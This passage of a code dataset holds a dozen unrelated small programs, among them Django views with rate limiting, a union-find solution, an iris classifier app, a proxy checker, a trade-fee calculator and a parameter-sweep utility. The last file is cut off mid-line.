name='adminong_registration'),\n path('adminong_login/', views.adminong_login, name='adminong_login'),\n path('adminong_success/', views.adminong_success, name='adminong_success'),\n\n path('logout/', auth_views.LogoutView.as_view(), name='logout'),\n]\n","repo_name":"Luiiizks/Projeto-ConexaoAmor","sub_path":"usuarios/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25872792321","text":"import sys\ndef input():\n return sys.stdin.readline().rstrip()\ndef find_parents(x):\n if x == make_set[x]:\n return x\n make_set[x] = find_parents(make_set[x])\n return make_set[x]\ndef union(x,y):\n X = find_parents(x)\n Y = find_parents(y)\n if X != Y:\n if ranks[X] < ranks[Y]:\n X,Y = Y,X\n make_set[Y] = X\n if ranks[X] == ranks[Y]:\n ranks[X] += 1\n return True\n return False\nN,M = map(int,input().split())\nmake_set = [i for i in range(N+1)]\nranks = [1 for _ in range(N+1)]\nanswer = 0\nfor i in range(M):\n x,y = map(int,input().split())\n if not union(x,y):\n answer += 1\n\n\n\nfor i in range(1,N+1):\n if find_parents(i) == i:\n answer += 1\n\nanswer -= 1\nprint(answer)\n","repo_name":"gkgg123/TIL_new","sub_path":"알고리즘/백준/20955_민서의_응급_수술_version1.py","file_name":"20955_민서의_응급_수술_version1.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34782260759","text":"\n# Importer les librairies nécessaires\n\nimport streamlit as st\nfrom sklearn import datasets\nfrom sklearn.ensemble import RandomForestClassifier\n\n# Chargement des données dépuis sklearn\n\niris = datasets.load_iris()\nX = iris.data\nY = iris.target\n\n# Faisons la prévision\n\nclf = RandomForestClassifier()\nclf.fit(X, Y)\n\n# Création de l'application avec streamlit\n\nst.title(\"Iris Flower Classification\")\nst.header(\"Enter the measurements of the Iris flower:\")\n\n# Ajoutons les paramètres\n\nsepal_length = st.slider(\"Sepal Length\", float(X[:, 0].min()), float(X[:, 0].max()), float(X[:, 0].mean()))\nsepal_width = st.slider(\"Sepal Width\", float(X[:, 1].min()), float(X[:, 1].max()), float(X[:, 1].mean()))\npetal_length = st.slider(\"Petal Length\", float(X[:, 2].min()), float(X[:, 2].max()), float(X[:, 2].mean()))\npetal_width = st.slider(\"Petal Width\", float(X[:, 3].min()), float(X[:, 3].max()), float(X[:, 3].mean()))\n\n# Définissons un bouton de prédiction\n\npredict_button = st.button(\"Predict\")\n\n# Affichage de la prédiction du type de fleur d'iris\n\nif predict_button:\n prediction = clf.predict([[sepal_length, sepal_width, petal_length, petal_width]])\n target_names = iris.target_names\n st.write(f\"Predicted Iris Flower Type: {target_names[prediction[0]]}\")\n\n","repo_name":"EOupoh76/Iris_datasetPredictor_App","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31791833352","text":"#!/bin/sh\n# -*- python -*-\n\n################################################################################\n# This file is python 2/3 bilingual. \n# The line \"\"\":\" starts a comment in python and is a no-op in shell.\n\"\"\":\"\n# Shell code to find and run a suitable python interpreter.\nfor cmd in python3 python python2; do\n command -v > /dev/null $cmd && exec $cmd $0 \"$@\"\ndone\n\necho \"Error: Could not find a valid python interpreter --> exiting!\" >&2\nexit 2\n\":\"\"\" # this line ends the python comment and is a no-op in shell.\n################################################################################\n\n# Git Version: @git@\n\n#-----------------------------------------------------------------------\n# XALT: A tool to track the programs on a cluster.\n# Copyright (C) 2013-2017 Robert McLay and Mark Fahey\n# \n# This library is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as\n# published by the Free Software Foundation; either version 2.1 of \n# the License, or (at your option) any later version. \n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details. \n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free\n# Software Foundation, Inc., 59 Temple Place, Suite 330,\n# Boston, MA 02111-1307 USA\n#-----------------------------------------------------------------------\n\nfrom __future__ import print_function\nimport os, sys, re, time\n\ndirNm, execName = os.path.split(os.path.realpath(sys.argv[0]))\nsys.path.insert(1,os.path.realpath(os.path.join(dirNm, \"../libexec\")))\nsys.path.insert(1,os.path.realpath(os.path.join(dirNm, \"../site\")))\n\nfrom progressBar import ProgressBar\n\nclass MY_FILEH(object):\n def __init__(self, fileName_pattern):\n self.__fileHandle = {}\n self.__pattern = fileName_pattern\n\n def get_file_handle(self,syshost):\n if (not syshost in self.__fileHandle):\n fn = self.__pattern + \"-\" + syshost\n self.__fileHandle[syshost] = open(fn,\"w\")\n return self.__fileHandle[syshost]\n\n def close_file_handles(self):\n for fh in self.__fileHandle:\n self.__fileHandle[fh].close()\n\n\ndef main():\n fileName = sys.argv[1]\n fileH = MY_FILEH(fileName)\n syshostPattern = re.compile(r'syshost:([^ ]*) ')\n fnSz = os.path.getsize(fileName)\n\n pbar = ProgressBar(maxVal=fnSz)\n sz = 0\n t1 = time.time()\n\n with open(fileName) as f:\n for line in f:\n sz += len(line)\n pbar.update(sz)\n m = syshostPattern.search(line)\n if (not m):\n continue\n syshost = m.group(1)\n fh = fileH.get_file_handle(syshost)\n fh.write(line)\n\n fileH.close_file_handles()\n pbar.fini()\n t2 = time.time()\n print(\"Time: \", time.strftime(\"%T\", time.gmtime(t2-t1)))\n\nif ( __name__ == '__main__'): main()\n","repo_name":"xalt/xalt","sub_path":"py_src/xalt_split_syslog_fn.in.py","file_name":"xalt_split_syslog_fn.in.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"48"} +{"seq_id":"9599002482","text":"# -*- coding: utf-8 -*-\n# vim: expandtab:tabstop=4:hlsearch\n#\n# This file is part of django-xmpp-account (https://github.com/mathiasertl/django-xmpp-account/).\n#\n# django-xmpp-account is free software: you can redistribute it and/or modify it under the terms of\n# the GNU General Public License as published by the Free Software Foundation, either version 3 of\n# the License, or (at your option) any later version.\n#\n# django-xmpp-account is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;\n# without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See\n# the GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along with django-xmpp-account.\n# If not, see <http://www.gnu.org/licenses/>.\n\nfrom __future__ import unicode_literals\n\nimport logging\n\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom django.utils.six.moves.urllib.parse import urlsplit\nfrom django.utils.translation import ugettext as _\nfrom django.views.generic import FormView\n\nfrom brake.decorators import ratelimit\n\nfrom xmpp_backends.base import UserExists\nfrom xmpp_backends.base import UserNotFound\n\nfrom core.exceptions import GpgError\nfrom core.exceptions import RateException\nfrom core.exceptions import SpamException\nfrom core.models import Address\nfrom core.models import Confirmation\nfrom core.models import UserAddresses\nfrom core.tasks import send_email\nfrom core.utils import confirm\nfrom core.utils import get_client_ip\n\nUser = get_user_model()\nlog = logging.getLogger(__name__)\n\n\nclass AntiSpamFormView(FormView):\n action_url = None\n\n def dispatch(self, request, *args, **kwargs):\n remote_ip = get_client_ip(request)\n\n if settings.DEBUG is False and remote_ip not in settings.RATELIMIT_WHITELIST:\n # create a dummy function and dynamically set its name. This way,\n # the ratelimit decorator is specific to the method in each class.\n def func(request):\n pass\n func.__name__ = str('%s_dispatch' % self.__class__.__name__)\n func = ratelimit(method='POST', rate='15/m')(func)\n ratelimit(method='GET', rate='40/m')(func)(request)\n\n if getattr(request, 'limited', False):\n raise RateException()\n\n # We sometimes get requests *without* a user agent. We assume these are automated requests.\n if not request.META.get('HTTP_USER_AGENT'):\n raise SpamException(\"No user agent passed.\")\n\n return super(AntiSpamFormView, self).dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(AntiSpamFormView, self).get_context_data(**kwargs)\n context['menuitem'] = getattr(self, 'menuitem', None)\n\n # Social media\n action_url = self.action_url\n if action_url is not None:\n action_url = reverse(action_url)\n context['ACTION_URL'] = self.request.build_absolute_uri(action_url)\n context['REGISTER_URL'] = self.request.build_absolute_uri('/')\n\n if 'CANONICAL_HOST' in self.request.site:\n context['ACTION_URL'] = urlsplit(context['ACTION_URL'])._replace(\n netloc=self.request.site['CANONICAL_HOST']).geturl()\n context['REGISTER_URL'] = urlsplit(context['REGISTER_URL'])._replace(\n netloc=self.request.site['CANONICAL_HOST']).geturl()\n\n context['OPENGRAPH_TITLE'] = self.opengraph_title % self.request.site\n context['OPENGRAPH_DESCRIPTION'] = self.opengraph_description % self.request.site\n context['TWITTER_TEXT'] = getattr(self, 'twitter_text', context['OPENGRAPH_TITLE'])\n\n form = context['form']\n if settings.GPG and hasattr(form, 'cleaned_data') and 'gpg_key' in form.fields:\n if form['gpg_key'].errors or form['fingerprint'].errors or \\\n form.cleaned_data.get('fingerprint') or form.cleaned_data.get('gpg_key'):\n context['show_gpg'] = True\n return context\n\n def get_form_kwargs(self):\n kwargs = super(AntiSpamFormView, self).get_form_kwargs()\n\n if 'username' in self.form_class.declared_fields:\n kwargs['initial']['username'] = '@%s' % self.request.site['DOMAIN']\n return kwargs\n\n def form_valid(self, form):\n return self.render_to_response(self.get_context_data(form=form))\n\n\nclass ConfirmationView(AntiSpamFormView):\n user_not_found_error = _(\"User not found (or false password provided)!\")\n\n def handle_valid(self, form, user):\n \"\"\"By default, the users current fingerprint is the payload.\"\"\"\n\n return {\n 'gpg_fingerprint': user.gpg_fingerprint,\n 'username': user.node,\n 'domain': user.domain,\n }\n\n def handle_gpg(self, form, user):\n if not settings.GPG:\n return {} # shortcut\n\n if form.cleaned_data.get('fingerprint'):\n fingerprint = form.cleaned_data['fingerprint']\n\n return {'gpg_fingerprint': fingerprint, }\n elif 'gpg_key' in self.request.FILES:\n path = self.request.FILES['gpg_key'].temporary_file_path()\n with open(path) as stream:\n data = stream.read()\n return {'gpg_key': data, }\n else:\n return {'gpg_fingerprint': None, }\n\n def form_valid(self, form):\n try:\n user = self.get_user(form.cleaned_data)\n payload = self.handle_valid(form, user)\n except GpgError as e:\n form.add_error(e.field, e.message)\n return self.form_invalid(form)\n except User.DoesNotExist:\n form.add_error(None, self.user_not_found_error)\n return self.form_invalid(form)\n except UserNotFound as e:\n if e.args and e.args[0]:\n form.add_error(None, e.args[0].encode('utf-8'))\n else:\n form.add_error(None, self.user_not_found_error)\n return self.form_invalid(form)\n\n # log user address:\n address = Address.objects.get_or_create(address=self.request.META['REMOTE_ADDR'])[0]\n UserAddresses.objects.create(address=address, user=user, purpose=self.purpose)\n\n # Send confirmation email to the user\n key, kwargs = confirm(self.request, user, purpose=self.purpose, payload=payload)\n if settings.BROKER_URL is None:\n key.send(**kwargs)\n else:\n send_email.delay(key_id=key.pk, **kwargs)\n\n return super(ConfirmationView, self).form_valid(form)\n\n\nclass ConfirmedView(AntiSpamFormView):\n user = None\n\n def dispatch(self, request, *args, **kwargs):\n if request.META.get('HTTP_USER_AGENT', '').startswith('Twitterbot'):\n return HttpResponseRedirect(reverse(self.action_url))\n return super(ConfirmedView, self).dispatch(request, *args, **kwargs)\n\n def after_delete(self, data):\n pass\n\n def get_context_data(self, **kwargs):\n context = super(ConfirmedView, self).get_context_data(**kwargs)\n if self.user is not None:\n context['username'] = self.user.node\n context['domain'] = self.user.domain\n context['jid'] = self.user.jid\n return context\n\n def form_valid(self, form):\n try:\n key = Confirmation.objects.valid().filter(\n purpose=self.purpose).get(key=self.kwargs['key'])\n except Confirmation.DoesNotExist:\n form.add_error(None, _(\"Confirmation key expired or not found.\"))\n return self.form_invalid(form)\n self.user = key.user\n\n try:\n self.handle_key(key, form)\n key.delete()\n self.after_delete(form.cleaned_data)\n except UserNotFound as e:\n if e.message:\n form.add_error(None, _(\"User not found: %s\") % e.message)\n else:\n form.add_error(None, _(\"User not found!\"))\n return self.form_invalid(form)\n except UserExists:\n form.add_error(None, _(\"User already exists!\"))\n return self.form_invalid(form)\n\n return super(ConfirmedView, self).form_valid(form)\n","repo_name":"mathiasertl/django-xmpp-account","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8308,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"14258590891","text":"import requests\nimport pymysql\n\n\nclass GetIp(object):\n \"\"\"从数据库中取出可用的IP给爬虫使用\"\"\"\n conn = pymysql.connect(host=\"127.0.0.1\", user=\"root\", password=\"root\", db=\"outback\")\n cursor = conn.cursor()\n\n def get_random_ip(self):\n select_sql = \"select ip,port,type from ip_proxy ORDER by rand() limit 1\"\n\n result = self.cursor.execute(select_sql)\n for ip_info in self.cursor.fetchall():\n ip = ip_info[0]\n port = ip_info[1]\n type = ip_info[2].lower()\n judge_result = self.judge_ip(type, ip, port, )\n if judge_result:\n # 这里不能关闭连接,因为每一个请求都会云获取一个IP,如果关了,就只能获取一个\n # self.cursor.close()\n # self.conn.close()\n\n return \"{0}://{1}:{2}\".format(type, ip, port)\n else:\n self.get_random_ip()\n\n def judge_ip(self, type, ip, port):\n baidu = \"https://www.baidu.com\"\n proxy_url = \"{0}://{1}:{2}\".format(type, ip, port)\n try:\n proxy_dict = {type:proxy_url,}\n response = requests.get(baidu, proxies=proxy_dict)\n except Exception as e:\n print(\"invalid in or port \")\n self.delete_ip(ip)\n return False\n else:\n code = response.status_code\n if code >= 200 and code < 300:\n print(\"effective ip,the ip is\",proxy_url)\n return True\n else:\n print(\"invalid iP \")\n self.delete_ip(ip)\n return False\n\n def delete_ip(self, ip):\n delete_sql = \"\"\"delete FROM ip_proxy where ip='{0}'\"\"\".format(ip)\n try:\n self.cursor.execute(delete_sql)\n self.conn.commit()\n except Exception as e:\n print(e)\n\n\n\nif __name__ == \"__main__\":\n get_ip = GetIp()\n ip = get_ip.get_random_ip()\n print(ip)\n","repo_name":"cosmosy-z/taobao","sub_path":"taobao/tools/get_ip.py","file_name":"get_ip.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21022270394","text":"import os\nimport numpy as np\nimport datetime\nimport time\nimport data\n#from objax.functional.loss import cross_entropy_logits_sparse\nimport jax.numpy as jnp\nfrom jax import pmap, host_id, jit\nfrom jax.tree_util import tree_map\n\n\ndef DTS():\n return datetime.datetime.now().strftime('%Y%m%d_%H%M%S')\n\n\ndef ensure_dir_exists(directory):\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef ensure_dir_exists_for_file(fname):\n ensure_dir_exists(os.path.dirname(fname))\n\n\ndef shard(x):\n # pmap x across first axis\n return pmap(lambda v: v)(x)\n\n\ndef replicate(x, replicas=8):\n # replicate x and then shard\n replicated = jnp.stack([x] * replicas)\n return shard(replicated)\n\n\ndef shapes_of(pytree):\n # rebuild a pytree swapping actual params for just shape and type\n return tree_map(lambda v: (v.shape, type(v)), pytree)\n\n\ndef reshape_leading_axis(x, s, from_axis=1):\n return x.reshape((*s, *x.shape[from_axis:]))\n\n\ndef primary_host():\n return host_id() == 0\n\n\nclass EarlyStopping(object):\n def __init__(self, patience=3, burn_in=5, max_runtime=None,\n smoothing=0.0):\n # smoothing = 0.0 => no smoothing\n\n self.original_patience = patience\n self.patience = patience\n self.burn_in = burn_in\n self.lowest_value = None\n\n self.decided_to_stop = False\n if max_runtime is not None:\n self.exit_time = time.time() + max_runtime\n else:\n self.exit_time = None\n\n if smoothing < 0.0 or smoothing > 1.0:\n raise Exception(\"invalid smoothing value %s\" % smoothing)\n self.smoothing = 1.0 - smoothing\n self.smoothed_value = None\n\n def should_stop(self, value):\n # if we've already decided to stop then return True immediately\n if self.decided_to_stop:\n return True\n\n # calc smoothed value\n if self.smoothed_value is None:\n self.smoothed_value = value\n else:\n self.smoothed_value += self.smoothing * \\\n (value - self.smoothed_value)\n\n # run taken too long?\n if self.exit_time is not None:\n if time.time() > self.exit_time:\n self.decided_to_stop = True\n return True\n\n # ignore first burn_in iterations\n if self.burn_in > 0:\n self.burn_in -= 1\n return False\n\n # take very first value we see as the lowest\n if self.lowest_value is None:\n self.lowest_value = self.smoothed_value\n\n # check if we've made an improvement; if so reset patience and record\n # new lowest\n made_improvement = self.smoothed_value < self.lowest_value\n if made_improvement:\n self.patience = self.original_patience\n self.lowest_value = self.smoothed_value\n return False\n\n # if no improvement made reduce patience. if no more patience exit.\n self.patience -= 1\n if self.patience == 0:\n self.decided_to_stop = True\n return True\n else:\n return False\n\n def stopped(self):\n return self.decided_to_stop\n\n\ndef accuracy(predict_fn, dataset):\n num_correct = 0\n num_total = 0\n for imgs, labels in dataset:\n predictions = predict_fn(imgs)\n num_correct += jnp.sum(predictions == labels)\n num_total += len(labels)\n accuracy = num_correct / num_total\n return accuracy\n","repo_name":"matpalm/ensemble_net","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3448,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"22714552151","text":"import numpy as np\nimport pandas as pd\nfrom keras.preprocessing.image import load_img\nfrom skimage.transform import resize\n\nimg_size_ori = 101\nimg_size_target = 128\n\ndef upsample(img):\n if img_size_ori == img_size_target:\n return img\n return resize(img, (img_size_target, img_size_target), mode='constant', preserve_range=True)\n\nfold = 4\ntrain_fold = f'../folds/train_fold_{fold}.csv'\nvalid_fold = f'../folds/valid_fold_{fold}.csv'\n\ntrain_df = pd.read_csv(train_fold, index_col=\"id\", usecols=[0])\nvalid_df = pd.read_csv(valid_fold, index_col=\"id\", usecols=[0])\ndepths_df = pd.read_csv(\"../../input/depths.csv\", index_col=\"id\")\ntrain_df = train_df.join(depths_df)\ntest_df = depths_df[~depths_df.index.isin(train_df.index) & ~depths_df.index.isin(valid_df.index)]\n\nx_test = np.array(\n [upsample(np.array(load_img('../../input/test/images/{}.png'.format(idx), color_mode='grayscale'))) / 255 for idx in\n test_df.index]).reshape(-1, 128, 128, 1)\na = 1","repo_name":"igorsoldatov/tgs_salt","sub_path":"unet_resnet/unet_resnet_v3/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4612245656","text":"# text to be entered by user\ntext = input('Enter text:')\n\n\ndef backward(string):\n \"\"\"\n This function backwards words longer\n than 3 signs in a string\n :param string: string entered by user\n :return: string with reversed words unless\n shorter then 3 signs\n \"\"\"\n string = string.split()\n words = []\n for word in string:\n if len(word) > 3:\n words.append(word[::-1])\n else:\n words.append(word)\n\n words = ' '.join(words)\n return words\n\n\nif __name__ == '__main__':\n result = backward(text)\n print(result)\n","repo_name":"jadamowi/PAT_interview","sub_path":"stringBackward.py","file_name":"stringBackward.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30477553293","text":"'''\nСоздайте переменную с именем compnum и присвойте ей значение 50. \nПредложи��е пользователю ввести число. Пока предположение не совпадает со значением compnum, \nсообщите, больше оно или меньше compnum, и предложите ввести другое число. \nЕсли введенное значение совпадет с compnum, выведите сообщение «Well done, you took [попытки] attempts».\n'''\n\ncompnum = 50\nanswer = 'y'\nnum = int(input('Enter the number: '))\nattempts = 1\n\n\nwhile num != compnum:\n if num < compnum:\n print('Low')\n else:\n print('High')\n attempts += 1\n num = int(input('Another number: '))\nprint('Well done, you took', attempts, 'attempts')\n\n\n","repo_name":"Mikopashpe/Python_Exercises","sub_path":"Ex049_cycle_while.py","file_name":"Ex049_cycle_while.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26855672589","text":"from tkinter import *\nfrom tkinter import ttk\n\n# Formula\n# Investible amount / Unit price of share = Number of shares (input)\n# No. of Shares X Unit Price of Share = Investible Amount (calculate)\n# No. of Shares X Commission Per Share (default 0.1$) + Fixed Commission Amount (default 3$) = Total Commission Amount(calculate)\n# Investible Amount + Total Commission Amount = Total Invested Plus Fee Cost (final output)\n\n\nclass GUI(object):\n\n def __init__ (self, window):\n self.window = window\n self.window.wm_title(\"Trade fee Calculator\") \n self.balanceLabel = ttk.Label( window, text = \"Balance\")\n self.investiableLabel = ttk.Label(window, text=\"Amount to Invest $\")\n self.unitSharePriceLabel = ttk.Label(window, text=\"Unit price of share\")\n self.shareNumberLabel = ttk.Label(window, text=\"Number of shares\")\n self.shareCommissionLabel = ttk.Label(window, text=\"Commission Per Share $\")\n self.fixedCommissionLabel = ttk.Label(window, text=\"Fixed Commission Amount $\")\n self.totalCommissionLabel = ttk.Label(window, text=\"Total Commission Amount $\")\n self.totalInvestedCostLabel = ttk.Label(window, text= \"Total Invested Plus Fee Cost $\")\n self.balanceAfterLabel = ttk.Label(window, text=\"Balance after\")\n\n self.balanceEntry = ttk.Entry()\n self.investiableEntry = ttk.Entry()\n self.unitSharePriceEntry = ttk.Entry()\n self.shareNumberEntry = ttk.Entry()\n self.shareCommissionEntry = ttk.Entry()\n self.shareCommissionEntry.insert(0,'0.1')\n self.fixedCommissionEntry = ttk.Entry()\n self.fixedCommissionEntry.insert(0,'3')\n self.totalCommissionEntry = ttk.Entry()\n self.totalInvestedCostEntry = ttk.Entry()\n self.balanceAfterEntry = ttk.Entry()\n\n self.buttoncalNumShares = ttk.Button(window, text=\"Calculate Number of shares\", \n command=lambda:self.calNumShares(self.investiableEntry.get(),self.unitSharePriceEntry.get()))\n\n self.buttoncalInvestAmt = ttk.Button(window, text=\"Calculate Investiable amount\",\n command=lambda:self.calInvestAmt(self.shareNumberEntry.get(),self.unitSharePriceEntry.get()))\n\n self.buttoncalCommissionAmt = ttk.Button(window, text=\"Calculate Total Commission amount\", \n command=lambda:self.calCommissionAmt(self.shareNumberEntry.get(),self.shareCommissionEntry.get(),self.fixedCommissionEntry.get()))\n \n self.buttoncalTotalinvestCost = ttk.Button(window, text=\"Calculate Total Invested Plus Fee Cost\", \n command=lambda:self.calTotalinvestCost(self.investiableEntry.get(),self.totalCommissionEntry.get()))\n\n self.buttoncalTotalinvestCostOneStep = ttk.Button(window, text=\"Calculate Total Invested Plus Fee Cost 1 step\", \n command=lambda:self.calTotalinvestCostOneStep(self.investiableEntry.get(),self.unitSharePriceEntry.get()))\n\n self.buttondelete=ttk.Button(window,text='Clear',width=10, command=lambda:self.clear())\n \n self.balanceLabel.pack()\n self.balanceEntry.pack()\n\n self.investiableLabel.pack()\n self.investiableEntry.pack()\n \n self.unitSharePriceLabel.pack()\n self.unitSharePriceEntry.pack()\n \n\n self.shareNumberLabel.pack()\n self.shareNumberEntry.pack()\n\n self.shareCommissionLabel.pack()\n self.shareCommissionEntry.pack()\n\n self.fixedCommissionLabel.pack()\n self.fixedCommissionEntry.pack()\n\n self.totalCommissionLabel.pack()\n self.totalCommissionEntry.pack()\n\n self.totalInvestedCostLabel.pack()\n self.totalInvestedCostEntry.pack()\n\n self.balanceAfterLabel.pack()\n self.balanceAfterEntry.pack()\n\n # self.buttoncalNumShares.pack()\n # self.buttoncalInvestAmt.pack()\n # self.buttoncalCommissionAmt.pack()\n # self.buttoncalTotalinvestCost.pack()\n self.buttoncalTotalinvestCostOneStep.pack()\n self.buttondelete.pack()\n\n def calNumShares(self, investamount,shareUnitPrice):\n result=float(investamount)/float(shareUnitPrice)\n self.shareNumberEntry.delete(0,END)\n self.shareNumberEntry.insert(0,result)\n print(result)\n \n def calInvestAmt(self, shareNumber, shareUnitPrice):\n result=float(shareNumber)*float(shareUnitPrice)\n self.investiableEntry.delete(0,END)\n self.investiableEntry.insert(0,result)\n print(result)\n \n def calCommissionAmt(self, shareNumber, shareCommission, fixedCommissionAmt):\n result=float(shareNumber)*float(shareCommission)+float(fixedCommissionAmt)\n self.totalCommissionEntry.delete(0,END)\n self.totalCommissionEntry.insert(0,result)\n print(result)\n \n def calTotalinvestCost(self, investAmt, totalCommissionAmt):\n result=float(investAmt)+float(totalCommissionAmt)\n self.totalInvestedCostEntry.delete(0,END)\n self.totalInvestedCostEntry.insert(0,result)\n print(result)\n\n def calTotalinvestCostOneStep(self,investamount,shareUnitPrice):\n shareNum=float(investamount)/float(shareUnitPrice)\n self.shareNumberEntry.delete(0,END)\n self.shareNumberEntry.insert(0,shareNum) \n commissionAmt=shareNum*float(self.shareCommissionEntry.get())+float(self.fixedCommissionEntry.get()) \n result=commissionAmt+float(investamount)\n balance = float(self.balanceEntry.get()) - result\n self.totalCommissionEntry.delete(0,END)\n self.totalCommissionEntry.insert(0,commissionAmt)\n self.totalInvestedCostEntry.delete(0,END)\n self.totalInvestedCostEntry.insert(0,result)\n self.balanceAfterEntry.delete(0,END)\n self.balanceAfterEntry.insert(0,balance)\n print(result)\n\n def clear(self):\n self.shareNumberEntry.delete(0,END)\n self.unitSharePriceEntry.delete(0,END)\n self.investiableEntry.delete(0,END)\n self.totalInvestedCostEntry.delete(0,END)\n self.totalCommissionEntry.delete(0,END)\n self.balanceEntry.delete(0,END)\n self.balanceAfterEntry.delete(0,END)\n\ndef main ():\n rootwindow=Tk() \n windowUI=GUI(rootwindow)\n rootwindow.mainloop()\n\nif __name__ == '__main__': main()\n\n\n","repo_name":"mdzapeer/TradeFeeCalculator","sub_path":"tradefeecalc.py","file_name":"tradefeecalc.py","file_ext":"py","file_size_in_byte":6228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"29330106810","text":"import itertools\nfrom collections import namedtuple, defaultdict\nfrom contextlib import contextmanager\nfrom typing import TypeVar, ContextManager, Iterable, Union, Dict\n\nfrom params_proto.proto import Meta, ParamsProto, Proto\n\n\ndef dot_join(*keys):\n \"\"\"remove Nones from the keys, but not '', \"\"\"\n _ = [k for k in keys if k]\n if not _:\n return None\n return \".\".join(_)\n\n\nItem = namedtuple('Item', ['key', 'value'])\n\n\ndef key_items(d, prefix=None):\n \"\"\"\n Takes in tuples of [key, value], or [None, [[key, value], ...]]\n returns wtf\n \"\"\"\n for k, vs in d:\n _ = dot_join(prefix, k)\n yield [Item(_, v) if _ else v for v in vs]\n\n\ndef flatten_items(row) -> Iterable[Item]:\n if isinstance(row, Item):\n yield row\n elif isinstance(row, Iterable):\n for item in row:\n yield from flatten_items(item)\n else:\n yield row\n\n\nT = TypeVar('ParamsProto')\n\n\nclass Sweep:\n _d = None\n __original = None\n __noot = None\n\n __each_fn = None\n\n def each(self, fn):\n self.__each_fn = fn\n return self\n\n # noinspection PyProtectedMember\n def __init__(self, *protos: Meta):\n # the ParamsProto is updatable via proto._update(dot_dict)\n # use object itself as key if _prefix is missing\n self.root: Dict[str, ParamsProto] = {p._prefix or p: p for p in protos}\n self.stack = [[]]\n\n def __len__(self):\n return len(self.list)\n\n def __getitem__(self, item: Union[slice, int, float]):\n if isinstance(item, slice):\n assert item.step != 0, \"step can not be zero.\"\n if (item.start and item.start < 0) or (item.stop and item.stop < 0) or (item.step and item.step < 0):\n for override in self.list[item]:\n for org, proto in zip(self.original, self.noot.values()):\n proto._update(**org)\n proto._update(override)\n yield override\n return\n for i, el in enumerate(self):\n if item.start is not None and i < item.start:\n continue\n if item.step is None or (i - (item.start or 0)) % item.step == 0:\n yield el\n if item.stop is None:\n continue\n if i >= item.stop - 1:\n break\n elif isinstance(item, int):\n # need-test: Not tested from a quick glance.\n if item < 0:\n for override in self.list[item]:\n for org, proto in zip(self.original, self.noot.values()):\n proto._update(**org)\n proto._update(override)\n yield override\n for i, el in enumerate(self):\n if i == item:\n for org, proto in zip(self.original, self.noot.values()):\n proto._update(**org)\n proto._update(el)\n yield el\n break\n else:\n raise NotImplementedError(f\"slicing is not implemented for {item}\")\n\n def items(self):\n return enumerate(self)\n\n @property\n def list(self):\n \"\"\"returns self as a list. Currently not idempotent. Might become idempotent in the future.\"\"\"\n return [*iter(self)]\n\n @property\n def dataframe(self):\n import pandas as pd\n return pd.DataFrame(self.list)\n\n @property\n def __dict__(self):\n if self._d:\n return self._d\n self._d = defaultdict(list)\n for config in self:\n for k, v in config.items():\n self._d[k].append(v)\n return self._d\n\n @property\n def noot(self):\n from copy import deepcopy\n return deepcopy(self.root)\n\n @property\n def snack(self):\n from copy import deepcopy\n return deepcopy(self.stack)\n\n def __enter__(self):\n self.stack.append([])\n for proto in self.root.values():\n data = {}\n\n def set_hook(_, k, v, p=proto._prefix):\n # note: we wrap this value in Proto, so that we can distinguish\n # between true None vs a None value set by the user.\n data[k] = Proto(v)\n return self.set_param(k, [v], prefix=p)\n\n def get_hook(_, k, p=proto._prefix):\n # note: This is intern used in the PraramsProto clas, to decide on\n # overwride without key string filtering which is prone to errors.\n return data.get(k, None)\n\n proto._add_hooks(set_hook, get_hook)\n\n return self\n\n def __exit__(self, *args):\n for proto in self.root.values():\n proto._pop_hooks()\n\n frame = self.stack.pop(-1)\n result = itertools.product(*key_items(frame))\n self.set_param(None, result)\n\n @property\n def original(self):\n\n if self.__original is None:\n self.__original = []\n for proto in self.noot.values():\n # noinspection PyCallByClass\n def no_reset(k):\n return getattr(type.__getattribute__(proto, k), \"accumulant\", False)\n\n self.__original.append({k: v\n for k, v in vars(proto).items()\n if not no_reset(k)})\n return self.__original\n\n def __iter__(self):\n for row in itertools.chain(*[it.value for it in self.snack[-1]]):\n override = dict(flatten_items(row))\n for org, proto in zip(self.original, self.noot.values()):\n proto._update(**org)\n # only 